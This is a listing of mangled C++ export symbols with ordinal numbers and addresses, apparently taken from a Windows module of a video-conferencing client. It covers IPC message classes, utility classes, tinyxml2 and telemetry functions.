              ??_7CSBMBMessage_CCIVideoShowEmbedWindowRequest@@6B@20680x4e5180
              ??_7CSBMBMessage_CCIVideoUseAudioRequest@@6B@20690x4e76e0
              ??_7CSBMBMessage_CCIVideoUserDataUpdateNotify@@6B@20700x4e8c7c
              ??_7CSBMBMessage_CCIVideoWarmTransferNotify@@6B@20710x4e5390
              ??_7CSBMBMessage_CCIVideoWarmTransferRequest@@6B@20720x4e6efc
              ??_7CSBMBMessage_CDNEventIndication@@6B@20730x4e9114
              ??_7CSBMBMessage_CameraControlGroupAdded@@6B@20740x4e53c0
              ??_7CSBMBMessage_CameraControlGroupFetched@@6B@20750x4e98fc
              ??_7CSBMBMessage_CameraControlGroupRemoved@@6B@20760x4e912c
              ??_7CSBMBMessage_CancelDownloadComponent@@6B@20770x4e5ff0
              ??_7CSBMBMessage_ChatWithBuddy@@6B@20780x4e94bc
              ??_7CSBMBMessage_CheckInSessionReq@@6B@20790x4e9f1c
              ??_7CSBMBMessage_CheckInSessionRsp@@6B@20800x4e90e4
              ??_7CSBMBMessage_CheckNomadic911_Notification@@6B@20810x4e87e4
              ??_7CSBMBMessage_Client3rdSDK_SDKCmdNotify@@6B@20820x4e8514
              ??_7CSBMBMessage_Client3rdSDK_SDKCmdRequest@@6B@20830x4ea054
              ??_7CSBMBMessage_CompanionTokenRequest@@6B@20840x4e738c
              ??_7CSBMBMessage_CompanionTokenResponse@@6B@20850x4e864c
              ??_7CSBMBMessage_ComponentDownloadResult@@6B@20860x4ea204
              ??_7CSBMBMessage_ConfGetZRMeetingInfoReq@@6B@20870x4ea27c
              ??_7CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterRequest@@6B@20880x4e7f74
              ??_7CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@6B@20890x4ea834
              ??_7CSBMBMessage_ConfInterProcessAudioSharingServiceUnregisterResponse@@6B@20900x4ea024
              ??_7CSBMBMessage_ConfirmConfLeave@@6B@20910x4e7c44
              ??_7CSBMBMessage_ConfirmRecaptcha@@6B@20920x4e6700
              ??_7CSBMBMessage_Doc2ImgCancelConvertRequest@@6B@20930x4e9c7c
              ??_7CSBMBMessage_Doc2ImgCancelConvertResponse@@6B@20940x4e93a8
              ??_7CSBMBMessage_Doc2ImgConvertFinish@@6B@20950x4e997c
              ??_7CSBMBMessage_Doc2ImgConvertProgress@@6B@20960x4e9684
              ??_7CSBMBMessage_Doc2ImgStartConvertRequest@@6B@20970x4e897c
              ??_7CSBMBMessage_Doc2ImgStartConvertResponse@@6B@20980x4e7e0c
              ??_7CSBMBMessage_DocsShareStartMeetingCollaboratorsInviteInfo@@6B@20990x4e9024
              ??_7CSBMBMessage_ECDNInfo@@6B@21000x4e948c
              ??_7CSBMBMessage_ECDNSetBackupSuperNodeInfo@@6B@21010x4e54c8
              ??_7CSBMBMessage_ECDNUpdateSuperNodeMaxLoad@@6B@21020x4e8454
              ??_7CSBMBMessage_EnableQualtricsFeedback@@6B@21030x4ea78c
              ??_7CSBMBMessage_EnableSubscribePresence@@6B@21040x4e5240
              ??_7CSBMBMessage_GetPresence@@6B@21050x4e99c4
              ??_7CSBMBMessage_GetPresenceResponse@@6B@21060x4e9204
              ??_7CSBMBMessage_HeartBeatRequest@@6B@21070x4ea21c
              ??_7CSBMBMessage_HuddlesOnShowAvatarStateChange@@6B@21080x4e7bb4
              ??_7CSBMBMessage_IGotIt@@6B@21090x4e969c
              ??_7CSBMBMessage_IPCSDK_SDKCmdNotify@@6B@21100x4e9ed4
              ??_7CSBMBMessage_IPCSDK_SDKCmdRequest@@6B@21110x4e95f4
              ??_7CSBMBMessage_InitThread@@6B@21120x4e86c4
              ??_7CSBMBMessage_InitUserPolicySettings@@6B@21130x4e9e44
              ??_7CSBMBMessage_InviteBuddyToMeeting@@6B@21140x4e870c
              ??_7CSBMBMessage_InviteRoomSystemResult@@6B@21150x4e8e14
              ??_7CSBMBMessage_InviteWinStatus@@6B@21160x4ea804
              ??_7CSBMBMessage_InviteZoomPhoneTokenRequest@@6B@21170x4e9174
              ??_7CSBMBMessage_InviteZoomPhoneTokenResponse@@6B@21180x4e7e6c
              ??_7CSBMBMessage_InviteeCredRequest@@6B@21190x4e86f4
              ??_7CSBMBMessage_InviteeCredResponse@@6B@21200x4ea5f4
              ??_7CSBMBMessage_InviteeIakRequest@@6B@21210x4e8f1c
              ??_7CSBMBMessage_InviteeIakResponse@@6B@21220x4e9144
              ??_7CSBMBMessage_JoinCompliantMeetingAutoCall@@6B@21230x4e822c
              ??_7CSBMBMessage_KeepAlive@@6B@21240x4e7dac
              ??_7CSBMBMessage_LCPRecordOperate@@6B@21250x4e7c5c
              ??_7CSBMBMessage_LeaveBeforeMeetingStartNotify@@6B@21260x4e85d4
              ??_7CSBMBMessage_LeaveConfErrorDesc@@6B@21270x4e9564
              ??_7CSBMBMessage_LogService_StartChannel@@6B@21280x4e906c
              ??_7CSBMBMessage_LogService_StopChannel@@6B@21290x4e7f5c
              ??_7CSBMBMessage_LogService_SubChannelAdd@@6B@21300x4e9e74
              ??_7CSBMBMessage_LogService_SubChannelRemove@@6B@21310x4e9c4c
              ??_7CSBMBMessage_MakeCallLogInfo@@6B@21320x4e8784
              ??_7CSBMBMessage_MediaAPIRequest@@6B@21330x4e994c
              ??_7CSBMBMessage_MediaAPIResponse@@6B@21340x4e9474
              ??_7CSBMBMessage_MeetingCacheBytesKVOperate@@6B@21350x4ea1ec
              ??_7CSBMBMessage_MeetingDiagInfo@@6B@21360x4e98c4
              ??_7CSBMBMessage_MeetingPAAPToggleEvent@@6B@21370x4e7ad4
              ??_7CSBMBMessage_MeetingWallpaperStartDownload@@6B@21380x4e8f34
              ??_7CSBMBMessage_MeetingWallpaperThumbStartDownload@@6B@21390x4e88ec
              ??_7CSBMBMessage_MeshNotification@@6B@21400x4e7be4
              ??_7CSBMBMessage_MyMeetingStatus@@6B@21410x4e8a84
              ??_7CSBMBMessage_NotifyActivateConf@@6B@21420x4ea3e4
              ??_7CSBMBMessage_NotifyAfterInit@@6B@21430x4e71c0
              ??_7CSBMBMessage_NotifyAfterObjCreated@@6B@21440x4ea384
              ??_7CSBMBMessage_NotifyAppActive@@6B@21450x4e51b0
              ??_7CSBMBMessage_NotifyAppEvent@@6B@21460x4ea36c
              ??_7CSBMBMessage_NotifyAppInActive@@6B@21470x4e7cec
              ??_7CSBMBMessage_NotifyAssistantStart@@6B@21480x4e7e3c
              ??_7CSBMBMessage_NotifyAssistantStop@@6B@21490x4e8c34
              ??_7CSBMBMessage_NotifyBandwidthLimitUpdate@@6B@21500x4e9258
              ??_7CSBMBMessage_NotifyBeforeObjDestroyed@@6B@21510x4e8d6c
              ??_7CSBMBMessage_NotifyBeforeTerm@@6B@21520x4e5c5c
              ??_7CSBMBMessage_NotifyCallCommand@@6B@21530x4e84fc
              ??_7CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@6B@21540x4e6bbc
              ??_7CSBMBMessage_NotifyCheckUpdateResponse@@6B@21550x4e8b2c
              ??_7CSBMBMessage_NotifyClaimHost@@6B@21560x4e83f4
              ??_7CSBMBMessage_NotifyClientRegistry@@6B@21570x4e83dc
              ??_7CSBMBMessage_NotifyClientUnRegistry@@6B@21580x4e8fac
              ??_7CSBMBMessage_NotifyConfPListChanged@@6B@21590x4e55e8
              ??_7CSBMBMessage_NotifyConfSelected@@6B@21600x4e7dc4
              ??_7CSBMBMessage_NotifyConfStart@@6B@21610x4e52a0
              ??_7CSBMBMessage_NotifyConfStop@@6B@21620x4e7e84
              ??_7CSBMBMessage_NotifyConfTokenResult@@6B@21630x4e83c4
              ??_7CSBMBMessage_NotifyConfZRMeetingInfo@@6B@21640x4ea2c4
              ??_7CSBMBMessage_NotifyConferenceStatus@@6B@21650x4e7a48
              ??_7CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@6B@21660x4e5648
              ??_7CSBMBMessage_NotifyDeviceReady@@6B@21670x4e987c
              ??_7CSBMBMessage_NotifyDownloadProgress@@6B@21680x4e93d8
              ??_7CSBMBMessage_NotifyEndSetting@@6B@21690x4e843c
              ??_7CSBMBMessage_NotifyInvitationSent@@6B@21700x4e7bcc
              ??_7CSBMBMessage_NotifyInviteFBBuddy@@6B@21710x4e81b4
              ??_7CSBMBMessage_NotifyJoinByMeetingNumber@@6B@21720x4ea06c
              ??_7CSBMBMessage_NotifyJoinFailForForceUpdate@@6B@21730x4e9804
              ??_7CSBMBMessage_NotifyLeaveConf@@6B@21740x4e810c
              ??_7CSBMBMessage_NotifyMeetingCallResponse@@6B@21750x4e86ac
              ??_7CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@6B@21760x4ea2dc
              ??_7CSBMBMessage_NotifyMeetingEmojiDownloadStatus@@6B@21770x4e7c74
              ??_7CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@6B@21780x4ea474
              ??_7CSBMBMessage_NotifyMeetingImageDownloaded@@6B@21790x4e97d4
              ??_7CSBMBMessage_NotifyMeetingParamChanged@@6B@21800x4e80c4
              ??_7CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@6B@21810x4e51e0
              ??_7CSBMBMessage_NotifyNetworkStateChanged@@6B@21820x4e97a4
              ??_7CSBMBMessage_NotifyNetworkSwitch@@6B@21830x4e84b4
              ??_7CSBMBMessage_NotifyOpenDialPad@@6B@21840x4e50c0
              ??_7CSBMBMessage_NotifyOpenUrlWithAuth@@6B@21850x4e8e44
              ??_7CSBMBMessage_NotifyPTAddContact@@6B@21860x4ea33c
              ??_7CSBMBMessage_NotifyPTCallPeer@@6B@21870x4e7bfc
              ??_7CSBMBMessage_NotifyPTCleanIDPToken@@6B@21880x4e5138
              ??_7CSBMBMessage_NotifyPTDeviceInfo@@6B@21890x4e71f8
              ??_7CSBMBMessage_NotifyPTFeedbackInfo@@6B@21900x4e8364
              ??_7CSBMBMessage_NotifyPTLoginInfo@@6B@21910x4e7708
              ??_7CSBMBMessage_NotifyReceivedSelectMe@@6B@21920x4e88bc
              ??_7CSBMBMessage_NotifyRunningLate@@6B@21930x4e8f64
              ??_7CSBMBMessage_NotifySaveChat@@6B@21940x4e9d84
              ??_7CSBMBMessage_NotifySaveFileInMeetingChat@@6B@21950x4e8e74
              ??_7CSBMBMessage_NotifyShareFileInMeetingChat@@6B@21960x4e6634
              ??_7CSBMBMessage_NotifyStartAppShare@@6B@21970x4e9d6c
              ??_7CSBMBMessage_NotifyStartDocsShare@@6B@21980x4e7d4c
              ??_7CSBMBMessage_NotifyStartLogin@@6B@21990x4e7ee4
              ??_7CSBMBMessage_NotifyStartRecording@@6B@22000x4e9ba4
              ??_7CSBMBMessage_NotifyStartSetting@@6B@22010x4e5348
              ??_7CSBMBMessage_NotifyStartWhiteboardShare@@6B@22020x4e8664
              ??_7CSBMBMessage_NotifyUpdateDisclaimerStatus@@6B@22030x4e7fec
              ??_7CSBMBMessage_NotifyUpgradeAccount@@6B@22040x4e94ec
              ??_7CSBMBMessage_NotifyUserInputProxyAuth@@6B@22050x4e984c
              ??_7CSBMBMessage_NotifyUserPropertiesChanged@@6B@22060x4ea1a4
              ??_7CSBMBMessage_NotifyVideoLayoutDownloadStatus@@6B@22070x4e7eb4
              ??_7CSBMBMessage_Notify_PT_Process_PID@@6B@22080x4e873c
              ??_7CSBMBMessage_Notify_ZPNS_MeetingStart@@6B@22090x4ea144
              ??_7CSBMBMessage_OnZPFeatureNotification@@6B@22100x4e7128
              ??_7CSBMBMessage_OpenInviteRoomSystemCalloutTab@@6B@22110x4e7fa4
              ??_7CSBMBMessage_OpenLoginPanelForGuest@@6B@22120x4e7b1c
              ??_7CSBMBMessage_OperateAudioFacilityParam@@6B@22130x4e5bbc
              ??_7CSBMBMessage_OperateChatFacilityParam@@6B@22140x4e9c94
              ??_7CSBMBMessage_OperateScreenShareFacilityParam@@6B@22150x4e8634
              ??_7CSBMBMessage_OperateVideoFacilityParam@@6B@22160x4e8ae4
              ??_7CSBMBMessage_OutlookGetMAPICalendarEvents@@6B@22170x4e4c48
              ??_7CSBMBMessage_OutlookMAPIEventChangeNotify@@6B@22180x4e4c90
              ??_7CSBMBMessage_OutlookOnGetDefaultProfileNotify@@6B@22190x4e4c00
              ??_7CSBMBMessage_OutlookOnGetMAPICalendarEventsNotify@@6B@22200x4e4c78
              ??_7CSBMBMessage_OutlookRequest@@6B@22210x4e9054
              ??_7CSBMBMessage_OutlookResponse@@6B@22220x4ea54c
              ??_7CSBMBMessage_OutlookStartMeetingRequest@@6B@22230x4e9228
              ??_7CSBMBMessage_OutlookStartMeetingResponse@@6B@22240x4e8cc4
              ??_7CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Request@@6B@22250x4e8f94
              ??_7CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@6B@22260x4e6eb4
              ??_7CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@6B@22270x4e82d4
              ??_7CSBMBMessage_Outlook_IMIntegration_SelfEmail_Response@@6B@22280x4e78bc
              ??_7CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@6B@22290x4e9330
              ??_7CSBMBMessage_Outlook_IMIntegration_StartChat_Request@@6B@22300x4e9d0c
              ??_7CSBMBMessage_Outlook_IMIntegration_StartVideo_Request@@6B@22310x4e53d8
              ??_7CSBMBMessage_PMCCheckInTeamChatReq@@6B@22320x4e96e4
              ??_7CSBMBMessage_PMCCheckInTeamChatRsp@@6B@22330x4e7d64
              ??_7CSBMBMessage_PMCMeetChatMsgDeepLinkReq@@6B@22340x4e9318
              ??_7CSBMBMessage_PMCMeetChatMsgReaded@@6B@22350x4e879c
              ??_7CSBMBMessage_PMCMeetingEnded@@6B@22360x4e96b4
              ??_7CSBMBMessage_PMCOpenTeamChatReq@@6B@22370x4e82ec
              ??_7CSBMBMessage_PMCOpenTeamChatRsp@@6B@22380x4ea324
              ??_7CSBMBMessage_PMCQueryDefaultGiphyReq@@6B@22390x4e5a34
              ??_7CSBMBMessage_PMCQueryDefaultGiphyRsp@@6B@22400x4ea7a4
              ??_7CSBMBMessage_PMCTeamChatUpdated@@6B@22410x4e5678
              ??_7CSBMBMessage_PSCancelDownloadComponent@@6B@22420x4e9dcc
              ??_7CSBMBMessage_PSComponentDownloadProgress@@6B@22430x4e5318
              ??_7CSBMBMessage_PSComponentDownloadResult@@6B@22440x4e91d4
              ??_7CSBMBMessage_PSPTCustomMessage@@6B@22450x4e5b4c
              ??_7CSBMBMessage_PSPTNotify3DAvatarEnable@@6B@22460x4e6dd0
              ??_7CSBMBMessage_PSQueryComponentExist@@6B@22470x4e9744
              ??_7CSBMBMessage_PSQueryComponentExistResult@@6B@22480x4ea714
              ??_7CSBMBMessage_PSStartDownloadComponent@@6B@22490x4e876c
              ??_7CSBMBMessage_PS_PSAsyncRecordingUploadResult@@6B@22500x4ea00c
              ??_7CSBMBMessage_PS_PSResponseToTerm@@6B@22510x4e9e14
              ??_7CSBMBMessage_PS_PTRequestActiveAppEx@@6B@22520x4e7b04
              ??_7CSBMBMessage_PS_PTRequestToTerm@@6B@22530x4ea894
              ??_7CSBMBMessage_PS_PTReturnAsyncRecordingActionToken@@6B@22540x4e8bec
              ??_7CSBMBMessage_PS_UpdateAccountInfo@@6B@22550x4e831c
              ??_7CSBMBMessage_PS_UpdateKeyValueInfo@@6B@22560x4e8b14
              ??_7CSBMBMessage_PairRelationTokenRequest@@6B@22570x4e8b8c
              ??_7CSBMBMessage_PairRelationTokenResponse@@6B@22580x4e981c
              ??_7CSBMBMessage_PolicyUpdated@@6B@22590x4e80f4
              ??_7CSBMBMessage_PromptProxyAuth@@6B@22600x4e9714
              ??_7CSBMBMessage_RealNameAuthInfo@@6B@22610x4e5714
              ??_7CSBMBMessage_RecaptchaRequest@@6B@22620x4e7f44
              ??_7CSBMBMessage_RemoveCustom3DAvatarToWeb@@6B@22630x4e5408
              ??_7CSBMBMessage_RemoveFromCameraControlGroup@@6B@22640x4e73b0
              ??_7CSBMBMessage_ReportIssue@@6B@22650x4ea294
              ??_7CSBMBMessage_RequestMyIDPToken@@6B@22660x4e8484
              ??_7CSBMBMessage_RequestUpdateAICAdminSetting@@6B@22670x4ea0cc
              ??_7CSBMBMessage_SaveCustom3DAvatarToWeb@@6B@22680x4e5588
              ??_7CSBMBMessage_SettingUpdated@@6B@22690x4ea174
              ??_7CSBMBMessage_ShareMeetingChatReq@@6B@22700x4e9d9c
              ??_7CSBMBMessage_ShareMeetingChatRsp@@6B@22710x4e82bc
              ??_7CSBMBMessage_StartCallOutInfo@@6B@22720x4e610c
              ??_7CSBMBMessage_StartDownloadComponent@@6B@22730x4e9bbc
              ??_7CSBMBMessage_StartMeetingWithHostKey@@6B@22740x4e99f4
              ??_7CSBMBMessage_SubscribePresenceExpire@@6B@22750x4e7d7c
              ??_7CSBMBMessage_TermConf@@6B@22760x4e9b14
              ??_7CSBMBMessage_TermThread@@6B@22770x4ea03c
              ??_7CSBMBMessage_TrackingPAAPEvent@@6B@22780x4e90b4
              ??_7CSBMBMessage_UpdateCallSessionSummaryResponse@@6B@22790x4ea594
              ??_7CSBMBMessage_UpdateCustom3DAvatarToWeb@@6B@22800x4e885c
              ??_7CSBMBMessage_UpdateFeatureToggle@@6B@22810x4e867c
              ??_7CSBMBMessage_UpdateKeyValueInfo@@6B@22820x4ea7bc
              ??_7CSBMBMessage_UpdateLaunchConfParam@@6B@22830x4e9acc
              ??_7CSBMBMessage_UpdateOpFlags@@6B@22840x4e9dfc
              ??_7CSBMBMessage_UpdateRegisterServer@@6B@22850x4e834c
              ??_7CSBMBMessage_UploadExceptionMemoryLog@@6B@22860x4ea1bc
              ??_7CSBMBMessage_UploadFeedback@@6B@22870x4e7cd4
              ??_7CSBMBMessage_UploadPbxRealTimeMonitorLog@@6B@22880x4e855c
              ??_7CSBMBMessage_UserInTrustListInfo@@6B@22890x4ea2ac
              ??_7CSBMBMessage_UserUpdateName@@6B@22900x4e9624
              ??_7CSBMBMessage_UserUploadPicture@@6B@22910x4e951c
              ??_7CSBMBMessage_VCardDataRequest@@6B@22920x4e90fc
              ??_7CSBMBMessage_VCardDataResponse@@6B@22930x4e8a54
              ??_7CSBMBMessage_VCardFetchManagerInfo@@6B@22940x4e5a04
              ??_7CSBMBMessage_VCardSetBuddyStar@@6B@22950x4e93c0
              ??_7CSBMBMessage_VDIPluginPublicIP@@6B@22960x4ea66c
              ??_7CSBMBMessage_VDI_Chrome_JoinErrorInfo@@6B@22970x4e5a84
              ??_7CSBMBMessage_VDI_DiagLog_Content@@6B@22980x4e9084
              ??_7CSBMBMessage_VDI_Plugin_Info@@6B@22990x4ea42c
              ??_7CSBMBMessage_VTLSBypassFromWeb@@6B@23000x4e5288
              ??_7CSBMBMessage_VTLSConfirm@@6B@23010x4e5630
              ??_7CSBMBMessage_VTLSPrompt@@6B@23020x4e963c
              ??_7CSBMBMessage_WEBCLIENT_SEND_TO_ZR@@6B@23030x4e8acc
              ??_7CSBMBMessage_ZR_SEND_TO_WEBCLIENT@@6B@23040x4e5528
              ??_7CSBMBMessage_ZoomInternalNavigateURLEvent@@6B@23050x4e8d84
              ??_7CSBMBMessage_ZpnsUpdateHuddlesSettings@@6B@23060x4ea8c4
              ??_7CSBMessage_Assistant_AudioDeviceUpdateNotification@@6B@23070x4e7f14
              ??_7CSBMessage_Assistant_AudioQualityNotification@@6B@23080x4e97ec
              ??_7CSearchDir@Cmm@@6B@23090x4e4f9c
              ??_7CTimerProc@Cmm@@6B@23100x4ea918
              ??_7Channel@ssb_ipc@@6B@23110x4e98f4
              ??_7CmmInternelMsg@Cmm@@6B@23120x4ecb94
              ??_7CmmMQ_Msg@Cmm@@6B@23130x4e7ac0
              ??_7Delegate@PlatformThread@@6B@23140x4ea90c
              ??_7ICmmArchiveObject@Cmm@@6B@23150x4e7b7c
              ??_7ICmmModuleLoader@Cmm@@6B@23160x4ec830
              ??_7ISBAppProvider@Cmm@@6B@23170x4ec804
              ??_7IThread@Cmm@@6B@23180x4e9914
              ??_7Listener@Channel@ssb_ipc@@6B@23190x4e4b38
              ??_7SBIPCMessage_Connect@@6B@23200x4ec978
              ??_7SBIPCMessage_ConnectResponse@@6B@23210x4ec950
              ??_7SBIPCMessage_DisConnect@@6B@23220x4eca10
              ??_7XMLAttribute@tinyxml2@@6B@23230x4ec744
              ??_7XMLComment@tinyxml2@@6B@23240x4ecbc0
              ??_7XMLDeclaration@tinyxml2@@6B@23250x4ecd18
              ??_7XMLDocument@tinyxml2@@6B@23260x4ecd60
              ??_7XMLElement@tinyxml2@@6B@23270x4ecc48
              ??_7XMLNode@tinyxml2@@6B@23280x4eccd0
              ??_7XMLPrinter@tinyxml2@@6B@23290x4ec698
              ??_7XMLText@tinyxml2@@6B@23300x4ec6cc
              ??_7XMLUnknown@tinyxml2@@6B@23310x4ecdac
              ??_7XMLVisitor@tinyxml2@@6B@23320x4ec714
              ??_FCAtomicInt@Cmm@@QAEXXZ23330x417080
              ??_FCFile@Cmm@@QAEXXZ23340x411920
              ??_FCSeconds@Cmm@@QAEXXZ23350x4110f0
              ??_FCState@Cmm@@QAEXXZ23360x4171d0
              ??_FCTime@Cmm@@QAEXXZ23370x412010
              ??_FXMLDocument@tinyxml2@@QAEXXZ23380x454b80
              ??_FXMLPrinter@tinyxml2@@QAEXXZ23390x454ea0
              ?Accept@XMLComment@tinyxml2@@UBE_NPAVXMLVisitor@2@@Z23400x460cf0
              ?Accept@XMLDeclaration@tinyxml2@@UBE_NPAVXMLVisitor@2@@Z23410x460df0
              ?Accept@XMLDocument@tinyxml2@@UBE_NPAVXMLVisitor@2@@Z23420x460390
              ?Accept@XMLElement@tinyxml2@@UBE_NPAVXMLVisitor@2@@Z23430x4620f0
              ?Accept@XMLText@tinyxml2@@UBE_NPAVXMLVisitor@2@@Z23440x460bf0
              ?Accept@XMLUnknown@tinyxml2@@UBE_NPAVXMLVisitor@2@@Z23450x460ef0
              ?ActivateHighResolutionTimer@Time@Cmm@@SA_N_N@Z23460x4519b0
              ?Add@CAtomicInt@Cmm@@QAEJJ@Z23470x417050
              ?AddMessagePerfMetricsEnd@@YAXW4e_chat_perfmetrics_Perfmetrics_message_event@@ABV?$CStringT@_W@Cmm@@HH@Z23480x468e20
              ?AddMessagePerfMetricsStart@@YAXW4e_chat_perfmetrics_Perfmetrics_message_event@@ABV?$CStringT@_W@Cmm@@I@Z23490x468d80
              ?AddPackageDefine0@CCmmArchiveServiceImp@Archive@Cmm@@QAEHPBD@Z23500x455a20
              ?AddPerfTelemetry@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_int@@23510x4652e0
              ?AddPerfTelemetryEnd@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_in23520x465620
              ?AddPerfTelemetryEndWStack@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_23530x466230
              ?AddPerfTelemetryEndWithID@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_23540x465bb0
              ?AddPerfTelemetryEvent@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_23550x4667c0
              ?AddPerfTelemetryStacks@CCmmPerfTelemetry@@SAHABV?$CStringT@D@Cmm@@0_KH@Z23560x4664e0
              ?AddPerfTelemetryStart@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_23570x465310
              ?AddPerfTelemetryStartWStack@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_even23580x465e20
              ?AddPerfTelemetryStartWithID@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_even23590x465880
              ?AddPlatformPerfMetricsEnd@@YAXW4e_chat_perfmetrics_Perfmetrics_platform_event@@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@ABV?$CStringT@_W@Cmm@@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@HHH2@Z23600x468cc0
              ?AddPlatformPerfMetricsStart@@YAXW4e_chat_perfmetrics_Perfmetrics_platform_event@@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@ABV?$CStringT@_W@Cmm@@2@Z23610x468c10
              ?AddRef@CRefThread@Cmm@@QAEHXZ23620x4173e0
              ?AddTimerToList@CTimerID@Cmm@@CAXIPAVCTimerProc@2@@Z23630x452010
              ?AllocateSlot@ThreadLocalPlatform@internal@Cmm@@SAXAAK@Z23640x45f1d0
              ?Append@FilePath@Cmm@@QBE?AV12@ABV12@@Z23650x45b540
              ?Append@FilePath@Cmm@@QBE?AV12@ABV?$CStringT@_W@2@@Z23660x45b480
              ?AppendASCII@FilePath@Cmm@@QBE?AV12@ABVStringPiece@2@@Z23670x45b560
              ?AppendAttributeNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEHPAVXMLElement@tinyxml2@@PAV123@@Z23680x4593c0
              ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z23690x4587e0
              ?AppendName@CCmmArchivePath@Cmm@@QAEXABV?$CStringT@_W@2@@Z23700x459c50
